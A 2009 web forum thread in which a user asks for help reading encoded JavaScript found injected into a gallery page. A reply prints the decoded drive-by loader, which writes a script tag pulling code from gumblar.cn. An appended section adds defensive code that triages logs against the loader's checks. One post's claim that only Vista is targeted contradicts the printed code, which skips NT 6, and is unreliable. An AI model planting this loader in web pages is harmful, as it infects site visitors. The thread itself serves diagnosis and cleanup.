|
2009-05-01, 08:31 AM | #1 |
Lonewolf Internet Sales
|
convert encoded javascript?
I found this snippet in the head of a gallery. Javascript is not my forté, so I've not been having much success decoding it to determine if it's malicious or benign.
Any javascript gurus around here that can turn this back into readable code?
PHP Code:
|
2009-05-01, 08:40 AM | #2 |
a.k.a. Sparky
Join Date: Sep 2004
Location: West Palm Beach, FL, USA
Posts: 2,396
|
That is bad stuff, comes from an FTP exploit. Change your FTP password, have your host check your FTP logs. I would suspect hundreds if not thousands of files have been affected. Scan your machine for spyware/keyloggers/malware and don't use the same password as before.
Code:
var a="ScriptEngine",b="Version()+",j="",u=navigator.userAgent;if((u.indexOf("Win")>0)&&(u.indexOf("NT 6")<0)&&(document.cookie.indexOf("miek=1")<0)&&(typeof(zrvzts)!=typeof("A"))){zrvzts="A";eval("if(window."+a+")j=j+"+a+"Major"+b+a+"Minor"+b+a+"Build"+b+"j;");document.write("<script src=//gumblar.cn/rss/?id="+j+"><\/script>");}
__________________
SnapReplay.com a different way to share photos - iPhone & Android |
2009-05-01, 08:52 AM | #3 |
Lonewolf Internet Sales
|
Thanks, I figured it was most likely malicious since it was so heavily encoded.
Fortunately it's not on my box. But I will let the owner know he has a serious problem. |
2009-05-01, 09:01 AM | #4 |
a.k.a. Sparky
Join Date: Sep 2004
Location: West Palm Beach, FL, USA
Posts: 2,396
|
If you use Firefox, you can get the Web Developer Toolbar, which has a View Source/View Generated Source link. Problem is, if you've viewed the page, and the machine you're on is able to get the virus, you would have run the exploit.
This particular one only displays for the OS of machines that are exploitable, so, if you aren't running Windows Vista (NT6), it wouldn't even attempt the exploit.
__________________
SnapReplay.com a different way to share photos - iPhone & Android |
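The decoded snippet in post #2 checks the user agent and a cookie before it writes the script tag. As an added example (not code from the thread), the sketch below replays those checks against constructed request records to show which visitors the loader would have run for; the record fields and function names are assumptions.

```javascript
// Added example; the records below are constructed, not taken from real logs.
const SAMPLE_REQUESTS = [
  { ip: "192.0.2.10", ua: "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)", cookie: "" },
  { ip: "192.0.2.11", ua: "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)", cookie: "" },
  { ip: "192.0.2.12", ua: "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us)", cookie: "" },
  { ip: "192.0.2.13", ua: "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) Firefox/3.0.10",
    cookie: "sid=abc; miek=1" },
];

// Evaluates the three checks that can be judged from a request record.
// The fourth check, typeof(zrvzts), only stops a second run within one page.
function gateChecks(ua, cookie) {
  return {
    windows: ua.indexOf("Win") > 0,               // strictly > 0, as in the snippet
    notNt6: ua.indexOf("NT 6") < 0,               // NT 6.x user agents are skipped
    noMarkerCookie: cookie.indexOf("miek=1") < 0, // clients carrying the cookie are skipped
  };
}

// True when every check passes, i.e. the snippet would write its script tag.
function loaderWouldFire(ua, cookie) {
  const c = gateChecks(ua || "", cookie || "");
  return c.windows && c.notNt6 && c.noMarkerCookie;
}

// Returns one triage row per request, naming the first check that blocked it.
function triage(requests) {
  return requests.map(({ ip, ua, cookie }) => {
    const c = gateChecks(ua || "", cookie || "");
    const blockedBy = Object.keys(c).find((k) => !c[k]) || null;
    return { ip, exposed: blockedBy === null, blockedBy };
  });
}

console.table(triage(SAMPLE_REQUESTS));
```

Rows with `exposed: true` are the clients worth following up on when reviewing access logs for the period the injected file was live.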